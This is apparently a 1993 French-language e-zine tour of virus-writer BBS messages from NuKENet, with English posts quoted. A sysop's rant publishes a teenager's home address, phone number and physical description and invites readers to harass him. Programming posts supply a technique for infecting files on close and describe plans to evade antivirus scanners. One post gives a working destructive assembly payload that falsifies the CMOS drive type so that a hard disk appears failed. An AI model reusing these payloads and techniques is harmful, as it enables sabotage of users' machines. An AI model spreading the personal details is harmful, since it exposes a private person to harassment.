Junior in college and became genuinely interested in them. I called
McAfee Associates, Symantec, Central Point, and several others asking
how I could get a live virus or two so I could check it out for
myself. Everyone basically told me the same thing...NO! I didn't
know what to do... I was on the FIDO VIRUS forum and noticed a
number for the Virus Exchange in Sofia, Bulgaria. I copied down the
number and called...several times. Running up a huge phone bill, but
was getting what I wanted.
I made myself a promise after the Virus Exchange BBS went down. I
promised myself that I would share my viruses with the rest of the
computing community that wanted/needed them. I didn't want them to
have to go through what I had to with the various anti-virus "big
shots" like McAfee Associates. I knew that there were others out
there like I was a few years back when I was hunting for viruses and
couldn't get my hands on them.
So, now that I've stated my purpose in running my system, which is in
no way illegal, let me state McAfee Associates purpose in attempting
to shut me down. They need positive publicity - period. They are
in a sticky situation with legal matters at the present time and this
would be a way for them to avert attention away from it. They have
some sort of vendetta against people like myself, Aristotle,
FireCracker, Rock Steady, and others who make or distribute viruses.
This makes McAfee Associates appear to be the "good guys" and
everyone else "bad guys".
Aryeh Goretsky's calling me is just another feeble attempt by
McAfee's gang to shut down a BBS using scare tactics. Well, it won't
work here. The name "McAfee" or Aryeh Goretsky does nothing for me,
except for bring on an occasional bowel movement from time to time.
make their scanners and other products available on my system, but
refuse to use them...and I don't encourage users to use them. Their
product is at best adequate when compared to others.
So, John McAfee, Aryeh Goretsky, and your pack of lawyers...try to
shut me down. As previously stated, I've looked into the legality of
my opening screen and have been repeatedly told that it's not illegal
or slanderous. Why don't you guys print out the previous sentence,
roll it up, and shove it up your ass...because that's where it
belongs. You guys are talking out of your ass...which is nothing
new.
Oh yeah, let me tell you about the guy who started this whole thing.
His name is: MIKE SICA
He lives at: 14310 WEST SALISBURY ROAD
MIDLOTHIAN, VIRGINIA
His phone #: (804) 794-0533
I have more personal information, but choose not to release it at
this time. The above information is publically accessible.
Mike runs a BBS called Airwaves. It's a public domain system and
really a piece of shit if you ask me. He runs WildCat (yep...lame
bastard paid for it) BBS software and only has two nodes. The
message areas suck and I've been told that someone, for several
years, has been uploading infected software onto his system. He uses
McAfee's VSHIELD (which is not registered) and SCAN (also not
registered) to "protect" his software. Apparently someone created
several dozen "dummy" accounts and his file areas are literally
crawling with infected shareware/freeware files.
Mike Sica is usually up all night long because he has nothing better
to do with his life than "nerd-out" on his system. He's about 18
years old, has black hair, is about 5 foot 10, skinny and walks with
a limp. He's basically one of the biggest loosers I've ever talked
to and met. He attends a private school in Henrico County...close to
where I used to live. His dad is a Doctor at the Medical College of
Virginia. At times, Mike Sica works for his father, who by the way
is a Urologist, tending to the patients urine specimens. What a
living... Eighteen years old and has to suck on his daddy's dick for
a job! Just what I wanted to do when I was his age...NOT!
Feel free to use Mike Sica's information as you wish. I will not
encourage you to call and harass him. I will not also encourage you
to send farm animals or discontinue certain services to his parents
house. Or, if you just wanna tell him what a fucking asshole he is,
I will not try to stop you. Do what you want...many others have and
continue to do so.
Anyways, live long and prosper. Fuck McAfee and Fuck the Police! As
long as it's not illegal...keep on doing it!!
Digital Justice
Virus Syndicate SysOp
Oh yeah...here's my BBS intro screen:
--------------------------- Cut Here ------------------------------
You have reached (703)222-0033 Zoom v.32bis 14.4 Fax/Modem
Please make sure your line settings are: 8 data, no parity, 1 stop
+---------------------------------------------------------------+
: WELCOME TO McAfee ASSociates' HOMEBASE BBS... ------+ :
: _ /! : The Virus Help Forum : :
: \,o.O' : Running 1 Z00M Fax/Modem VFX v.32bis : :
: =(___)= : 14,400bps, v.32bis, v.42bis, MNP 2-5 : :
: U +---------------------------------------------------+ :
+---------------------------------------------------------------+
Choices: VIRUS, APPLY, CHECK, FEEDBACK, CHAT, GOODBYE
--------------------------- Cut Here ------------------------------
--- GEcho 1.00/beta+
* Origin: If at first you don't succeed...Dig deeper into the melon!
(40:1/13)
-------
Hehehe... Intressant... De quoi faire jaser les mmres du
911... Cette guerre (Psycho-guerre) entre McAfee Cie & Dark
Justice me semble assez partage...Je penche quand mme du ct de Dark
Justice... disons pour son annonce de Bbs... Mais si l'on en
croit le texte dcrit, et si on prend mot pour mot sa
description des faits (Qui ne dit pas s'il travaille
underground avec son board), Le tort va
McAfee, ou Mike
Sica... (???). De toutes faons, qu'il se dmerde... Y a l'air
assez grand pour a...
Ceci dit, comme vous le voyez, c'est probablement le propre du NuKENet de
scanner les messages
chaque node et de ne laisser passer que les plus
hots sur le net, car,
part le "small talk" pisodique, histoire de
dtendre un peu l'atmosphre, on parle business, ici, et c'est srieux.
Toutes les sections du net sont aussi... intressantes. La section [ASM
programming], par exemple...
-------
Msg #: [248/365] Base: ASM Programming [NuKENeT]
Date : 10 Jan 93 04:04:31 Stat: Sent
From : Arthur Ellis
To : All
Title: Heuristics
There has been some discussion of heuristic techniques lately. I had
occasion to code something of this sort recently, in order to deal with
a crypt which had a periodicity of 16 (i.e. there was an observable
repetition each 16 bytes). The program simply tries different "confusion
vectors" on the crypt and collects scores to determine how it is doing.
I'm working on the optimization now. Results look like this:
[C:\OUT\TEST]testent4 f2
994 bytes
Buffer: 4D 26 33 14 52 3E 48 6B 4F 0A 6E 0A 72 62 25 08 score
6.876523
Buffer: 63 26 7E 65 65 0C 67 4A 02 4A 68 17 52 56 41 67 score
6.804016
Buffer: 31 55 4B 46 71 36 57 6D 1F 6B 60 2D 73 6C 3A 15 score
6.787298
Buffer: 35 5A 36 3D 72 74 2F 60 7D 2E 1F 30 4A 56 68 32 score
6.729538
Buffer: 22 10 41 4F 01 63 14 1E 61 1B 59 41 15 13 10 52 score
6.612251
Buffer: 54 54 0B 1D 4F 47 40 47 1B 5A 7A 15 74 52 7D 16 score
6.577854
/* Crypt cracker by Arthur Ellis */
extern double entro(char *, int); // returns entropy of buffer
char *randomize(void);
void
main(int argc, char **argv)
{
/* Declarations and initializations go here */
srand(time(0));
while (!kbhit()) {
for (i = 0; i < bytes; i++) {
if (buf1[i] != '\n')
buf2[i] = buf1[i]; // buf2 is the work buffer
}
buf3 = randomize();
for (i = 0; i < bytes; i++) {
buf2[i] ^= buf3[i % 16]; // apply confusion vector
// every 16 bytes
}
score = entro(buf2, bytes);
if (score < lowscore) {
lowscore = score;
printf("Buffer: ");
for (i = 0; i < 16; i++)
printf("%02X ", buf3[i]);
printf("\tscore %f\n", (float) score);
}
}
fcloseall();
}
char *
randomize(void)
{
int i;
char *buf;
buf = malloc(16);
for (i = 0; i < 16; i++) {
buf[i] = rand() % 127;
}
return (buf);
}
--- Msged/sq
* Origin: Cyber City (40:2/2)
Msg #: [261/365] Base: ASM Programming [NuKENeT]
Date : Wed 13 Jan 1993 8:46p Stat: Sent Local
From : Rock Steady
To : Tormentor
Title: Re: debugging session?
Reply: This message is a reply to #260
*** Quoting Tormentor to Rock Steady ***
To> Hi Rock.
To> You told me before that you liked dive deep into debugging
To> sessions with Scan etc...
To> Whatabout making a report of the 'new scanning engine' that Scan
To> and Fprot uses?
To> Would be very useful, especially when it comes to polymorphic
To> code.
To> Maybe even extract the algorithm used for catching MtE?
To> I mean, if you look to the TPE, there he has put quite much work
To> in 'senseless instructions' and 'dumb jumps' but technically the
Humm, nice idea, I was working with that as a matter of fact, I was
working thru F-prot resently to by-pass some features, and why some of my
features didn't work, All it all I think I can provide some info, I hate
to do it all myself, I'm really not `too' happy, we got hundreds of Av
products. From a Stand point of view, my session with F-prot have been
challeging, its good, REAL good, VIRSTOP is not however, compared to
VSHIELD. Vshield will be a tough cookie, I dunno what I saw last time, by
quite comfusing, maybe its the C++ overhead? But its good, and then Scan,
the easiest of the all. However this will take sometime, I would want to
form an `team' of debuggers. I can't speak for myself, my lack of
knowledge on `Cryption' Sucks, This will throw me far out, but because of
my own Cracking background, bypassing any traps won't be a problem, I can
handle my self there, and come up with a `AntiStealth' routine to defeat
it.
But I'm not Good enough. I'm okay, but can't handle all this by my own,
I was willing to SET this as a goal for Info Journal #5 or #6, but its
demanding, I have been working with Screaming radish resently of F-prot,
we talk about some nice routines it had. But we need a few more other
guys. A Small team, never the less a good team. I can contact you guys,
I don't mind the call charges, (NOT), I don't wish to push anyone, But
frankly Tormentor I've seen some of your works, and your groups, quite
something, don't be a stranger here. Fuck the moral group expectations,
We shouldn't compete, as we have the same target in mind, self-knowledge
and show the `AVers' that there 100% effective Scanners suck!
Terminator-Z, lots of `steams' comes between us, what do you say? We could
use a a cool programmer?
Tormentor, So whats next? I'll jump into it if you come along...or else
its gotta wait and take a while, lets hit them with a BIG bang!
Rocky
Msg #: [267/365] Base: ASM Programming [NuKENeT]
Date : 12 Jan 93 22:57:00 Stat: Sent
From : Ken
To : Soltan Griss
Title: Disenfect on the fly
* In A Message To Ken, Soltan Griss Said:
SG> well thats what i have working right now, the only pproblem i seem
SG> to have is infecting the file on the close.. how would i get the
SG> file name from the handle. I have a PD program that i can add, but
SG> it's hugh. and i want a simpler way of doing it..
Here is how I do it. You need to get the system file table (SFT) for the
handle number.
push bx ; Save file handle
mov ax,1220h ; DOS get JFT entry
int 2fh ; Call DOS
; ES:[DI] contains the SFT
; entry for the file handle
mov ax,1216h ; DOS get SFT entry pointer
mov bx,byte ptr [di] ; Put SFT entry number in BX
int 2fh ; Call DOS
; ES:DI holds SFT pointer
; for the file
ES:DI now points to the SFT.
There are also lots of other goodies in this table. Here is the structure
for the SFT (from UNDOCUMENTED DOS)
For DOS 3.1+
------------
00h DWORD Pointer to next file table
04h WORD Number of files in this table
06h 35 bytes per file
00h WORD Number of file handles referring to this file
02h WORD File open mode (Int 21h/AH=3Dh) bit 15 set if
opened via FCB
04h BYTE File attribute
05h WORD Device info word
07h DWORD Pointer to device driver header if char. device
else pointer to DOS drive parameter block
0Bh WORD Starting cluster of file
0Dh WORD File time in packed format (Int 21h/AX=5700h)
0Fh WORD File date in packed format (Int 21h/AX=5700h)
11h DWORD File size
15h DWORD Current offset in file
19h WORD Relative cluster within file of last accessed
* 1Bh WORD Absolute cluster number of last accessed
0000h if never read or written to
* 1Dh WORD Number of sector containing directory entry
1Fh BYTE Number of directory entry within sector
--> 20h 8 BYTES Filename (No extension, padded with spaces)
--> 28h 3 BYTES File Extension
2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing
same file
2Fh WORD (SHARE.EXE) network machine number which opned
file
31h WORD PSP segment of file's owner
33h WORD Offset within SHARE.EXE code segment of sharing
record
* For DOS 4.x
-----------
1Bh DWORD Number of sector containing directory entry
1Dh 3 BYTES Unknown (Network redirector)
35h WORD (local) absolute cluster number of last
accessed
37h DWORD Pointer to IFS driver for file, 00000000h if
native DOS
So, in both cases, the file extension will start at DI+39.
-Ken
--- GEcho 1.00/beta+
* Origin: 2181EBE700727B8CC1F913CBB44ACD21 - (40:1/1)
Msg #: [274/365] Base: ASM Programming [NuKENeT]
Date : 17 Jan 93 19:29:27 Stat: Sent
From : Arthur Ellis
To : All
Title: CHKINT.COM
Here is the interrupt checker. It can be useful for finding unusual
interrupt routines.
N CHKINT.COM
E 0100 E9 99 01 0D 0A 43 48 4B 49 4E 54 20 28 43 29 20
E 0110 62 79 20 50 61 64 67 65 74 74 2C 20 31 39 38 39
E 0120 0A 0D 20 45 78 74 72 61 63 74 73 20 49 6E 74 65
E 0130 72 72 75 70 74 20 53 65 71 75 65 6E 63 65 73 20
E 0140 28 43 44 20 78 78 29 20 66 6F 75 6E 64 20 69 6E
E 0150 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65
E 0160 73 0A 0D 20 49 6E 76 6F 63 61 74 69 6F 6E 3A 20
E 0170 43 48 4B 49 4E 54 20 3C 66 69 6C 65 6E 61 6D 65
E 0180 3E 1A 24 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0280 00 00 00 00 24 00 00 00 00 00 00 00 20 20 20 00
E 0290 00 68 20 20 20 20 00 00 68 0D 0A 24 B4 62 CD 21
E 02A0 8E C3 BE 80 00 26 8A 0C 80 F9 00 75 09 BA 63 01
E 02B0 B4 09 CD 21 CD 20 46 8B 16 83 02 32 FF 8A D9 03
E 02C0 DE 26 89 17 46 89 36 85 02 B4 3D B0 00 8C DA 89
E 02D0 16 89 02 8C C2 8E DA 8B 16 85 02 CD 21 73 25 BA
E 02E0 EE 02 B4 09 CD 21 8B 16 85 02 CD 21 CD 20 20 43
E 02F0 6F 75 6C 64 20 6E 6F 74 20 6F 70 65 6E 20 46 69
E 0300 6C 65 20 24 A3 87 02 B4 09 8B 16 85 02 CD 21 BA
E 0310 1D 03 CD 21 8B 16 89 02 8E DA EB 3A 90 0D 0A 20
E 0320 50 6F 73 73 69 62 6C 65 20 49 6E 74 65 72 72 75
E 0330 70 74 73 20 46 6F 75 6E 64 20 0D 0A 20 20 20 4E
E 0340 6F 2E 20 20 20 54 69 6D 65 73 20 4F 63 63 75 72
E 0350 72 65 64 0D 0A 24 B4 3F B9 00 02 8B 1E 87 02 BA
E 0360 15 04 CD 21 73 22 BA 6F 03 B4 09 CD 21 CD 20 20
E 0370 42 61 64 20 66 69 6C 65 20 72 65 61 64 20 72 65
E 0380 70 6F 72 74 65 64 20 24 3D 00 00 7F 33 B4 3E CD
E 0390 21 BF 00 00 BB 00 00 8A 9D 83 01 83 FB 00 74 15
E 03A0 E8 51 00 A3 96 02 8B DF E8 49 00 A3 8F 02 BA 8C
E 03B0 02 B4 09 CD 21 47 81 FF FF 00 75 DB CD 20 CD 20
E 03C0 BE 15 04 8B C8 83 F9 00 74 8C 8A 04 46 49 80 3E
E 03D0 8B 02 00 7F 0B 3C CD 75 EC C6 06 8B 02 01 EB E5
E 03E0 32 E4 88 26 8B 02 8B F8 8A 9D 83 01 FE C3 88 9D
E 03F0 83 01 EB D1 33 C0 8A E3 80 E4 0F 80 C4 30 80 FC
E 0400 39 7E 03 80 C4 07 B1 04 8A C3 D2 E8 04 30 3C 39
E 0410 7E 02 04 07 C3 00 00 00 00 00 00 00 00 00 00 00
E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0610 00 00 00 00 00
RCX
0515
W
Q
--- Msged/sq
* Origin: Cyber City (40:2/2)
Msg #: [311/365] Base: ASM Programming [NuKENeT]
Date : 23 Jan 93 23:34:00 Stat: Sent
From : Screaming Radish
To : Rock Steady
Title: VCL routine
Hello Rock!
I promised you a routine to modify the drive types in cmos, so having a
hour to spare tonight I figured I may as well keep that promise. The
follow routine has been tested with the VCL 1.0 and as far as I can tell
works fine.
What this one does is change the cmos drive type for any defined drives
and recalculates the cmos checksum so there is no telltale cmos failure
message.
The net effect is the bios will either report a hard drive failure just
like it would with a dead drive or display a "no operating system"
message. No data is actually lost on the drive unless the user is a fool
and reformats, if they are that stupid the deserve to lose data ;-)
Screaming
=======================================================================
cld
push ds ; save ds
xor ax,ax ; zero ax
mov ds,ax ; ds = 0000h
mov si,046ch ; ticks since midnight
lodsw ; get lsw
mov bx,ax ; save it in bx
lodsw ; get msw
or bx,ax ; combine it with lsw
xor bl,bh ; combine into a byte
pop ds ; restore ds
mov dx,70h ; dx = register latch
address
mov al,2eh ; msb of checksum
out dx,al ; latch register address
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov ch,al ; msb to ch
dec dx ; dx = register latch
address
mov al,2fh ; lsb of checksum
out dx,al ; latch register address
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov cl,al ; lsb to cl
dec dx ; dx = register latch
address
mov al,12h ; hard drive type register
; bits 7-4 = first drive
; bits 3-0 = second drive
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov bh,al ; save drive types
sub cx,ax ; subtract from checksum
and al,0fh ; mask for second drive
jnz cmos_1 ; jmp if 2 hard drives
and bl,0f0h ; mask out 2nd drive
modifi
cmos_1: xor bl,bh ; modify drive types
xor bh,bh ; zero bh for checksum add
add cx,bx ; update checksum
dec dx ; dx = register latch
address
mov al,12h ; drive type register
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,bl ; new drive types
out dx,al ; write register
dec dx ; dx = register latch
address
mov al,2eh ; msb of checksum
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,ch ; msb of new checksum
out dx,al ; write register
dec dx ; dx = register latch
address
mov al,2fh ; lsb of checksum
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,cl ; lsb of new checksum
out dx,al ; write register
=======================================================================
--- GoldED 2.40
* Origin: The House of the Screaming Radish [NuKE] (111:950/75)
-------
On pourrait passer des heures
s'abreuver
ces sources de savoir que
sont les mecs de NukE, non?
Allez, encore deux messages, tirs des autres sections. Le premier parce
qu'il est rigolo, et le deuxime parce qu'il s,agit d'un indit de Bruce
Sterling! Y!
-------
Msg #: [172/196] Base: Phreaking Away [NuKENeT]
Date : Thu 21 Jan 1993 9:51a Stat: Sent Local
From : Ned239
To : Public Enemy
Title: Re: Hmm...
Reply: This message is a reply to #169 and has 1 reply
Don't know about Canada, but it is legal to listen on cordless
conversations in the U.S. The recent trouble Prince Charles was in stemmed
from the interecpt of a cordless conversation.....
ned239
Q. Is Windows a virus?
A. No, Windows is not a virus.Here's what viruses do:
1. They replicate quickly -- okay, Windows does that.
2. Viruses use up valuable system resources, slowing down the
system as they do so -- okay, Windows does that.
3. Viruses will, from time to time, trash your hard disk -- okay,
Windows does that too.
4. Viruses are usually carried, unknown to the user, along with
valuable programs and systems. Sigh.. Windows does that, too.
5. Viruses will occasionally make the user suspect their system is
too slow (see 2) and the user will buy new hardware. Yup, that's
with Windows, too. Maybe Windows is a virus.......Nope! There is
a difference! Viruses are well supported by their authors, are
frequently updated,and tend to become more sophisticated as they
mature.Therefore, windows is not a virus.
-------
But Windows take 4,867,045 Bytes more than a virus...
-------
Msg #: [267/284] Base: General Topics [NuKENeT]
Date : Sat 30 Jan 1993 9:31a Stat: Sent Local
From : Ned239
To : All
Title: interesting info
check this out;
Topic 16: Bruce Sterling Live at Mondo....
#123: Bruce Sterling (bruces) Sun, Aug 23, '92 (15:06) 56 lines
COMPUTER AS FUROSHIKI
"Computer as furoshiki" is a highly speculative vision of the
personal computer as it might evolve if freed from certain current
material constraints.
The furoshiki is an intimate and ubiquitous accessory to
Japanese
daily life. It's nothing more than a large square of tough, well-made
cloth, usually with a handsome pattern. The furoshiki is used, among
other purposes, as a grocery bag, a book-tote, and a decorative wrapper
for ceremonial gifts. In its simplicity and multiple uses it is little
different from a cowboy's bandanna, except that the skill in wrapping and
knotting furoshikis is more arcane.
The computer-as-furoshiki is the computer as a large square of
lightweight, flexible cloth. It is not, however, "cloth" as that material
is currently understood.
The furoshiki's display screen is formed by thin bands of
color-emitting optical fibers, which are wide enough and bright enough to
mimic the scan-lines of a video display terminal. These display-fibers
are interwoven with other fiber-optics carrying data.
A second kind of fiber is densely interwoven; it consists of
room-temperature superconductive wire, possibly a novel form of
buckminsterfullerene for strength and flexibility. This highly-charged
net of superconductors serves as a literal power-grid.
The third fiber is some currently-unknown form of piezoelectric
filament that can contract, relax, and therefore warp and knot itself in
response to precise electrical charges deployed along its length.
A fourth form of fiber serves as a radio antenna and communications
grid.
One section of the cloth can be radically stiffened to serve as the
diaphragm for an audio speaker.
Computation, memory, and movement are carried out by photonic,
photoelectronic, and electronic chips composed of custom-built artificial
diamond for low cost and strength. If the tensile fibers are composed of
organic proteins (which would seem likely), then the computer-as-furoshiki
consists mostly of carbon.
The device is operated with voice commands and touch, and possibly
gesture, through a similarly woven linked glove.
The computer-as-furoshiki is capable of limited movement. Early
versions might fold themselves up like a gentleman's handkerchief; later
models would resemble aluminum foil or Saran Wrap. Advanced versions can
fly.
Although this computer lacks direct video input, it might be capable
of optical character recognition if placed on a page, or of image-scanning
if placed on a graphic.
When placed on light-sensitive paper, or film, it generates
hard-copies. This computer might displace paper as a medium by usurping
not merely the information of paper but the physical properties of paper
as well.
When one's head is wrapped completely in the furoshiki, it becomes a
virtual-reality rig.
When not in use, the furoshiki is worn, as a scarf, tie, turban, or,
or course, the Console Cowboy's bandanna. Mainframes can be used as
pup-tents, supercomputers as Big Tops, for a late twenty-first-century
multimedia circus.
something to get the neurons firing.....
ned239
___________
C'tait un premier survol du NuKENeT, mesdames et messieurs. Nous allons
maintenant descendre un peu au ras du sol, histoire de survoler la
messagerie locale de Cybernetic Violence. Attachez vos ceintures!
-------
Msg #: [82/82] Base: General Msgs [LOCAL]
Date : Fri 12 Feb 1993 9:45p Stat: Public
From : A K 4 7 #122
To : All
Title: X rated GIFS.......
If there is anyone out there that knows the #'s to any boards that have
a LOT of X rated GIFS, please post the area codes and #'s here. Thanks.
-------
Mmmmmmpppppppffffff!!! Bon, ok! Ce message est local... Mais
quand mme, on pourrait l'aider ce jeune adolescent en rut...
Essaie l'AGBE! (Mchante gang de pattes folles)...
Un simple commentaire:
1- A-t-on besoin de payer 0,30$ / Minute de Ld
Mtl pour voir
ce genre de commentaire? No! Never!
Ahhhhhhhhhhhhh! Ca fait du bien d'tre mchant un peu! Je commencais
m'inquiter,
force de ne pas pouvoir placer une pique! Faut dire qu'avec
Cybernetic Violence, il n'y a pas beaucoup de conneries sur ce board.
C'est une denre rare...
Non, srieux, les mecs de NukE ont pouss la perversit jusqu'
espionner
l'ennemi, les gars de l'AV (anti-virus). Pour ce faire, ils ont mis sur
leur Net les posts du site d'Internet o s'crivent les Sara Gordon et
autres virus-busters!
Msg #: [4/165] Base: Comp.Virus
(Internet)[NuKENeT]
Date : 13 Jan 93 17:13:43 Stat: Sent
From : padgett
Title: What is a virus ?
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson)
There have been a number of learned comments on "beneficial" viruses
and the horrors thereof. I have not read Dr. Cohen's papers (if they
are available on the net, I would appreciate either FTP instructions
or their E-Mail - not being at a University has its limitations),
however I do have some opinions.
First, a virus appears to be executable code that propagates by
attaching itself to other programs. If it were a stand alone (not
requiring a host) it would be a Worm. If it did not propagate, it
might be a logic bomb, a trojan horse, or simply a program, but it
would not be a virus. Propagation is part of the definition.
Obviously companion & path viruses do not meet this test since they
do not attach themselves to other programs, rather they spoof the
OS into executing them instead of the requested program.
MBR and BSI infections are questionable. AZUSA in particular replaces
the entire MBR code and is probably more properly termed a logic bomb
than a virus (of course the popular definition calls *all* malicious
software viruses, but we are talking laboratory definitions now).
Therefore, to be strictly a virus, a program (xA) must affect a change
to another program (B) that adds the functionality of A to (B) such that
the function of a third program (C) can also have the functionality of
(A) added to it by the new program (BA).
In other words when xA executes in the presence of B, B becomes BA.
When BA executes in the presence of C, C becomes CA (*not* CBA).
Further, to be a *beneficial* virus, BA must retain all of the
functionality
of B unless some function(s) is to be specifically (and documentedly)
modified.
Here the Turing Halting Rule has a new effect: A has no way of
determining prior to the change of a random program B to BA whether
this change will be detrimental to the functionality of B. Period.
Now many people including myself have pointed to COPY as an example
of a virus. On reflection this is not true since while it is possible
to say COPY B.COM+COPY.COM B.COM, this will not add the functionality
of COPY.COM to B.COM. COPY cannot propagate itself. It can cause
programs to fail if used this way but that in itself does not make
COPY a virus.
Further, we have discussed the use of a program on a LAN to update
Client programs, but these do not meet the test since (C) cannot be
affected, only (B). Further since (B) has just been updated or
replaced and cannot update anything else once "fixed" this does not
meet the propagation test of a virus.
Consider the recent CHKDSK furor. I posted a simple detection mechanism
and "fix" that could easily be put into a program that might be executed
as searched for CHKDSK.EXE. If found, it is checked. If the old one, the
fix is applied.
THIS IS NOT A VIRUS. The original program's function is not propagated.
(B) did not become (BA), it became (B'). Certainly, if poorly written,
the update could cause damage and the public might call it a virus but
incorrectly.
Therefore, if we accept that to be a virus, the test of A + B = BA
and BA + C = CA must be met, then the Turing Halting Rule makes the
general case of a beneficial virus (cannot cause any harm in any
environment) impossible.
Enough,
Padgett
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)
Msg #: [8/165] Base: Comp.Virus
(Internet)[NuKENeT]
Date : 14 Jan 93 02:10:19 Stat: Sent Ô
Title: What do you want?
From: sara@news.rn.com (Sara Gordon)
Recently I posted request for info from anti-virus product
evaluators/services or persons with opinions on them. Thanks to
all who responded.
Now, I would like to inquire of anti-virus product users/purchasers
(and anyone who would care to respond):
1. What are the three most important factors you consider when
purchasing an anti-virus product? When your responses reference
technical capabilities, please be as specific as possible in
defining the capability which is important to you.
Please e-mail the responses, which will be categorized and published
as part of a little project i've undertaken to evaluate the 'evaluators'
:)
For those persons who asked me what kind of responses I have gotten
from the evaluators and product developers, it is this way: so far
the evaluators -for the most part- are not interested/willing to say
- -how- they evaluate anti-virus products. I am specifically interested
in finding information such as a.) what provisions are used to evaluate
heuristic modes of a-v products b.) what provisions are taken/made in
dealing with false positives c.) exactly (EXACTLY) what kind of machines
are these evaluations performed using? drives? boxes? hardcards? what
video displays, what dos versions?
This is relative only to standalone PC's, but even with this limitation,
I have had remarkable non-success in finding out exactly who is doing
what, and how they are doing it.
If you have any information you could share with me, I would appreciate
an e-mail from you !!
p.s. almost all people when asked what is the major problem with
evaluating state: not enough viruses, not enough time. some state
too many viruses, not enough time. concensus appears NOT ENOUGH TIME.
- --
# "talk to me about computer viruses............"
# fax/voice: 219-277-8599 sara@gator.use.com
# data 219-273-2431 SGordon@Dockmaster.ncsc.mil
# fidomail 1:227/190 vfr@netcom.com
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)
Date : 14 Jan 93 10:55:12 Stat: Sent
From : dklefkon
Title: Contents of conference proceedings, Ides of March
From: dklefkon@well.sf.ca.us (Richard W. Lefkon)
Nine days ago, FCWturing posted a protest to Virus-L concerning the
current ban on publishing viruses within the Proceedings of the
International Computer Security & Virus Conference.
I'm program chair and will try to be brief explaining what and why.
Those interested in the conference can call 800-835-2246 x190 and
get further informatin about March 10-12 in New York City.
1. The conference and its committee are NOT spokespersons for
DPMA/ACM/IEEE or the other five societies and five trade
publications involved. The local DPMA chapter hosts the
conference and organizations like ACM-SIGSAC and IEEE Computer
Society are cooperating sponsors.
As an example, IEEE sponsors literally HUNDREDS of worthwhile
seminars and conferences per year. But if IEEE wants to take
a position, its appropriate board will do that, not a conference.
Incidentally, the most recent position taken by the DPMA chapter
was in opposition to New Jersey programmer licensing legislation.
While this particular 1991 stance eventually did bubble up to
the top, the chapter does not speak for DPMA at large and the
conference does not speak for the chapter.
2. The ban on publishing viruses in the proceedings was put into
effect with last year's (5th International) conference. It
resulted from a post-mortem e-mail discussion by the conference
committee based on contents of the 1990 (4th) gathering.
Mr. Fred Cohen is a valued memember of the 16-person conference
